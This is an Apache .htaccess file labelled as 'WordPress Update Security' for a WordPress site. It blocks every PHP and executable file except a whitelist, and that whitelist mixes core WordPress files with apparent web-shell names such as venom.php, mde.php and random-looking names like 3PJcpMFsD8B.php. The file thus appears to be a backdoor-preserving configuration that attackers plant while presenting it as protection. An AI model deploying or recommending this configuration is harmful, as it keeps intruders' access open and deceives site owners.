############################################################
#                                                          #
#              WordPress Update Security @2026             #
#                                                          #
#        Protected Configuration & Access Control          #
#                                                          #
#      Unauthorized modifications are not recommended      #
#                                                          #
############################################################

<FilesMatch "\.(PhP|php7|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>

<FilesMatch "^(3PJcpMFsD8B\.php|4PJcpMFsD8B\.php|11PJcpMFsD8B\.php|ops\.php|goods\.php|wincust\.php|module\.php|service\.php|wp-login\.php|wp-blog-header\.php|admin-ajax\.php|wp-config\.php|wp-db\.php|pluggable\.php|wp-config-sample\.php|index\.php|contact\.php|error\.php|header\.php|icon\.php|profile\.php|venom\.php|mde\.php|amin-ajaxson\.php|class-wp-edits\.php|colour\.php|foter\.php|nux\.php|Mailo\.php|consol\.php|module\.audio\.flow\.php|woocommerce\.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

ErrorDocument 403 /index.php
ErrorDocument 404 /index.php